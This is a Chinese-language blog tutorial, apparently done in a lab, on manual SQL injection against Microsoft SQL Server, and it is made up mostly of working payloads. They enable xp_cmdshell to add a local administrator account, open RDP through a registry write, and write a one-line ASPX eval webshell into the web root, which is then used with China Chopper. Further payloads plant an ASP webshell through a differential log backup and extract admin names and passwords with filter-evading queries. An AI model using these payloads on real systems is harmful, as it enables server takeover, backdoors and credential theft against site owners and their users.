注入之mssql数据库(手工注入)

sa最高权限(可以获取系统权限)

  •     打开一个mssql数据库

        要拼接一个参数

注入之mssql数据库(手工注入)_第1张图片

      拼接这个参数?xxser=1

注入之mssql数据库(手工注入)_第2张图片

注入之mssql数据库(手工注入)_第3张图片

  • 检查是否是mssql数据库

        and exists (select * from%20sysobjects) 

为真是属于mssql

  •    查询当前数据库系统的用户名

        and system_user=0 (由于版本问题谷歌不可以)

注入之mssql数据库(手工注入)_第4张图片

可以去虚拟机,爆出系统用户名

注入之mssql数据库(手工注入)_第5张图片

 爆出的这个

注入之mssql数据库(手工注入)_第6张图片

  •     检查注入点是否为sa权限

        and 1=(select IS_SRVROLEMEMBER('sysadmin')) 

正常就是存在sa 权限

  • 判断一下xp_cmdshell存储过程是否存在

        and 1=(select count(*) from master.dbo.sysobjects where name ='xp_cmdshell')  

正常就是存在扩展程序
 恢复  EXEC sp_configure 'show advanced options', 1;RECONFIGURE sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

  •    添加帐号

        exec master..xp_cmdshell 'net user test test /add'
            查看用户

注入之mssql数据库(手工注入)_第7张图片

  没有xp_cmdshell
                    注入之mssql数据库(手工注入)_第8张图片
 

注入之mssql数据库(手工注入)_第9张图片

注入之mssql数据库(手工注入)_第10张图片

 下面的xp_cmdshell为false,直接改为true

注入之mssql数据库(手工注入)_第11张图片

或者 随便点一个数据库右键新建查询

注入之mssql数据库(手工注入)_第12张图片

select COUNT(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
 exec sp_configure 'xp_cmdshell',1
RECONFIGURE
GO
通过xp_cmdshell执行系统命令(看是否安装成功)

注入之mssql数据库(手工注入)_第13张图片

注入之mssql数据库(手工注入)_第14张图片

   ;exec master..xp_cmdshell 'net localgroup administrators test /add' 

  • 开3389

  ;execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;

注入之mssql数据库(手工注入)_第15张图片

dbowner(通过webshell插入一句话木马,控制电脑进行数据库差异备份)
    

  • 查看当前网站是否为db_owner权限

        and 1=(SELECT IS_MEMBER('db_owner'));--       判断当前数据库用户是否为db_owner权限

具备sa权限肯定具备db_owner权限

  • 找出网站路径

        1、通过报 错或baidu、google等查找
            

注入之mssql数据库(手工注入)_第16张图片

注入之mssql数据库(手工注入)_第17张图片

 2、通过相关语句
    drop table black;create Table black(result varchar(7996) null, id int not null identity (1,1))--

注入之mssql数据库(手工注入)_第18张图片

 insert into black exec master..xp_cmdshell 'dir /s c:\1.aspx'--   当前库testDB

注入之mssql数据库(手工注入)_第19张图片

  and (select result from black where id=4)>0--  

注入之mssql数据库(手工注入)_第20张图片

  • 写入一句话木马获取webshell

master..xp_cmd
  %20;exec%20master..xp_cmdshell%20'Echo%20" <%@ Page Language="Jscript"%><%eval(Request.Item["123"],"unsafe");%>">>%20c:\wwwtest\iis-xxser.com--wwwroot\sqlserver\muma.aspx'--

  多了一个木马   

注入之mssql数据库(手工注入)_第21张图片

注入之mssql数据库(手工注入)_第22张图片

 用菜刀连接

注入之mssql数据库(手工注入)_第23张图片

 可以正常操作

注入之mssql数据库(手工注入)_第24张图片

差异备份
 ;alter database testdb set RECOVERY FULL;create table test_tmp(str image);backup log testdb to disk='c:\test1' with init;insert into test_tmp(str) values (0x3C2565786375746528726571756573742822636D64222929253E);backup log testdb to disk='C:\wwwtest\iis-xxser.com--wwwroot\yjh.asp';alter database testdb set RECOVERY simple
 语句有问题

注入之mssql数据库(手工注入)_第25张图片

注入之mssql数据库(手工注入)_第26张图片

注入之mssql数据库(手工注入)_第27张图片

注入之mssql数据库(手工注入)_第28张图片

 文件已存在

注入之mssql数据库(手工注入)_第29张图片

  登录进去可以控制服务端

注入之mssql数据库(手工注入)_第30张图片

public(可以脱库,可以执行select语句)

  • 获取当前网站数据库名称

       and db_name()=0--

注入之mssql数据库(手工注入)_第31张图片

  • 获取mssql所有数据库名和路径

%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(256))%2bchar(94)%2bcast([filename]%20as%20nvarchar(256))%20from%20(select%20top%202%20dbid,name,filename%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--

注入之mssql数据库(手工注入)_第32张图片

  • 获取当前数据库所有表名

        and 0<>(select top 1 name from testdb.dbo.sysobjects where xtype=0x7500 and name not in (select top 2 name from testdb.dbo.sysobjects where xtype=0x7500))--

注入之mssql数据库(手工注入)_第33张图片

  • 爆表名及字段名

        having 1=1--

注入之mssql数据库(手工注入)_第34张图片

  group by admin.id having 1=1--

注入之mssql数据库(手工注入)_第35张图片

 group by admin.id,admin.name having 1=1--
            

  •    获取字段内容

 /**/and/**/(select/**/top/**/1/**/isnull(cast([id]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]/**/as/**/nvarchar(4000)),char(32))/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/and/**/id/**/not/**/in/**/(select/**/top/**/0/**/id/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/group/**/by/**/id))%3E0/**/and/**/1=1

注入之mssql数据库(手工注入)_第36张图片

        
                

你可能感兴趣的:(常见的漏洞,oracle,数据库,安全架构)